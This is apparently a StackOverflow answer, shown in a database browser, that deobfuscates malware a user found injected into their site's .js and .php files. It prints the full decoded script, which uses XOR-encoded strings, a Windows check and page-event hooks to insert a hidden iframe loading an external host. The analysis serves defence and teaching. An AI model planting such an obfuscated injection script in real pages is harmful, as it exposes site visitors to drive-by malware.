Databases
StackOverflow2013
Postsdbo
PO
 

Note that there are some explanatory texts on larger screens.

plurals
  1. PO
    primarykey
    data
    text
    <p>If you crawl through the code and methodically replace the junk identifier names, it makes a lot more sense. Most of the code and identifiers are just there to obscure, and a lot of the rest of it just looks like boilerplate code for browser-compatible ways to do things like attach events.</p> <p>It also makes a pretty big deal of checking that you're on Windows, for some reason, but that doesn't change the payload that's eventually delivered.</p> <p>The piece that deploys the payload to the page is here:</p> <pre><code> var newElement = window[_document][_createElement](_div); newElement[_innerHTML] = decodeString(key, payload); newElement[_style][_display] = _none; window[_document][_body][_appendChild](newElement); </code></pre> <p>The payload decrypts as:</p> <pre><code> &lt;iframe src='http://teenee.&amp;lt;OBFUSCATED&amp;gt;.com/speedo.msg?13' width='436' height='158' align="right"&gt;&lt;/iframe&gt; </code></pre> <p>Here's the full script as far as I decoded it:</p> <pre><code>&lt;script&gt; var payload = ["98", "73", "79", "45", "64", "92", "91", "66", "35", "70", "82", "4", "65", "80", "17", "76", "3", "74", "41", "69", "1", "40", "77", "52", "54", "42", "9", "22", "88", "0", "30", "59", "26", "94", "99", "85", "16", "86", "55", "34", "81", "67", "56", "97", "36", "78", "63", "72", "38", "43", "62", "7", "33", "96", "31", "25", "90", "19", "48", "6", "14", "87", "28", "13", "23", "24", "68", "39", "61", "49", "37", "71", "10", "12", "83", "44", "29", "32", "84", "50", "18", "100", "47", "15", "51", "20", "53", "11", "93", "58", "60", "2", "95", "8", "27", "75", "46", "21", "5", "89", "57"]; var key = ["83", "78", "4", "74", "7", "87", "29", "29", "21", "20", "29", "93", "11", "29", "14", "7", "87", "78", "83", "82", "72", "91", "78", "26", "82", "94", "83", "83", "12", "29", "94", "83", "26", "26", "74", "73", "20", "78", "5", "83", "95", "21", "95", "11", "2", "72", "72", "84", "7", "82", "86", "24", "84", "83", "95", "73", "94", "4", "78", "64", "24", "93", "9", "73", "91", "29", "26", "95", "95", "21", "72", "7", "93", "83", "0", "92", "78", "95", "87", "92", "82", "95", "89", "15", "91", "85", "21", "9", "91", "95", "78", "95", "87", "82", "20", "6", "77", "85", "6", "89", "93"]; function decodeString(msg, key) { var retval = ''; for (var i = 0; i &lt; msg.length; i++) retval += String.fromCharCode(parseInt(msg[key[i]]) ^ 58); return retval; } function decodeString2(msg, key) { var retval = ''; for (var i = 0; i &lt; msg.length; i++) retval += String.fromCharCode(parseInt(msg[i], 16) ^ key); return retval; } (function (_window) { var executePayload = function () { if (!_window.storedData) { _window.storedData = 133; var crypt1 = ["20", "2b", "27", "31", "29", "21", "2a", "30"]; var _document = decodeString2(crypt1, 68); var crypt2 = ["7f", "6e", "79", "7d", "68", "79", "59", "70", "79", "71", "79", "72", "68"]; var _createElement = decodeString2(crypt2, 28); var crypt3 = ["d3", "de", "c1"]; var _div = decodeString2(crypt3, 183); var crypt4 = ["90", "97", "97", "9c", "8b", "b1", "ad", "b4", "b5"]; var _innerHTML = decodeString2(crypt4, 249); var crypt5 = ["1f", "18", "15", "0", "9"]; var _style = decodeString2(crypt5, 108); var crypt6 = ["fd", "f0", "ea", "e9", "f5", "f8", "e0"]; var _display = decodeString2(crypt6, 153); var crypt7 = ["ed", "ec", "ed", "e6"]; var _none = decodeString2(crypt7, 131); var crypt9 = ["8e", "83", "88", "95"]; var _body = decodeString2(crypt9, 236); var crypt10 = ["7f", "6e", "6e", "7b", "70", "7a", "5d", "76", "77", "72", "7a"]; var _appendChild = decodeString2(crypt10, 30); if (function FRlTmsRJNFmnm() { var iBcOzbBLaJib = true; var yLjfQ = true; var Xbj = /*@cc_on true; @*/ false; if (Xbj) { iBcOzbBLaJib = true; } else { iBcOzbBLaJib = false; } var crypt1 = ["22", "1c", "1b"]; var _Win = decodeString2(crypt1, 117); var crypt2 = ["89", "a5", "a7"]; var _Mac = decodeString2(crypt2, 196); var crypt3 = ["2d", "8", "f", "14", "19"]; var _Linux = decodeString2(crypt3, 97); var crypt4 = ["af", "a0", "b7", "a8", "a6", "a0", "b5", "ae", "b3"]; var _navigator = decodeString2(crypt4, 193); var crypt5 = ["4d", "4a", "40", "41", "5c", "6b", "42"]; var _indexOf = decodeString2(crypt5, 36); var crypt6 = ["f5", "e9", "e4", "f1", "e3", "ea", "f7", "e8"]; var _platform = decodeString2(crypt6, 133); var browserSaysWindows = window[_navigator][_platform][_indexOf](_Win) &gt; -1; if (browserSaysWindows) { yLjfQ = true; } else { yLjfQ = false; } return (iBcOzbBLaJib &amp;&amp; yLjfQ); }()) { var newElement = window[_document][_createElement](_div); newElement[_innerHTML] = decodeString(key, payload); newElement[_style][_display] = _none; window[_document][_body][_appendChild](newElement); } } }; var crypt1 = ["b2", "b7", "b7", "96", "a5", "b6", "bd", "a7", "9f", "ba", "a0", "a7", "b6", "bd", "b6", "a1"]; var __addEventListener = decodeString2(crypt1, 211); var crypt2 = ["2f", "3a", "3a", "2f", "2d", "26", "b", "38", "2b", "20", "3a"]; var _attachEvent = decodeString2(crypt2, 78); var crypt3 = ["87", "86"]; var KdAtYlyqzy = decodeString2(crypt3, 232); var crypt4 = ["7a", "79", "77", "72"]; var _load = decodeString2(crypt4, 22); var crypt5 = ["76", "7f", "73", "65", "63"]; var focus = decodeString2(crypt5, 16); var crypt6 = ["67", "69", "70", "77"]; var _blur = decodeString2(crypt6, 5); var crypt7 = ["11", "13", "9", "f", "19", "11", "13", "key", "19"]; var _mousemove = decodeString2(crypt7, 124); var crypt8 = ["4b", "40", "42", "5d", "4a", "4e", "4b", "56"]; var _domready = decodeString2(crypt8, 47); var _addEventListener; if (_window[__addEventListener]) _addEventListener = __addEventListener; else _addEventListener = _attachEvent; var eventList = [_load, focus, _blur, _mousemove, _domready]; for (events in eventList) { _window[_addEventListener](eventList[events], executePayload, false); _window[_addEventListener]('on' + eventList[events], executePayload, false); } })(window) &lt;/script&gt; </code></pre> <p>Unfortunately, there's not much clue as to how it got here, just what it's doing: injecting an IFrame into your page, and you probably already knew that.</p> <p>Good luck!</p>
    singulars
    1. This table or related slice is empty.
    1. POmalware code insert script to my .js .php and include file. help me to decode script
      singulars
      1. PTQuestion
    1. PTAnswer
    1. USUmopepisdn
    1. USUmopepisdn
    plurals
    1. This table or related slice is empty.
    1. This table or related slice is empty.
    1. This table or related slice is empty.
    1. This table or related slice is empty.
    1. This table or related slice is empty.
    1. This table or related slice is empty.
 

Querying!

 
Guidance
A row detail

Detail views are divided into sections. All the information in the data section comes from columns in the selected row. The other sections display data from other, related rows.

Related data can be related in a to-one or a to-many fashion. Captions of data related in a to-many fashion link to a list view showing a filtered view of the table.

Try moving around until you find a non-empty to-many entry and click on the label to get to one. You can move back to the root by clicking on the database name in the header.

SQuiL has stopped working due to an internal error.

If you are curious you may find further information in the browser console, which is accessible through the devtools (F12).

Reload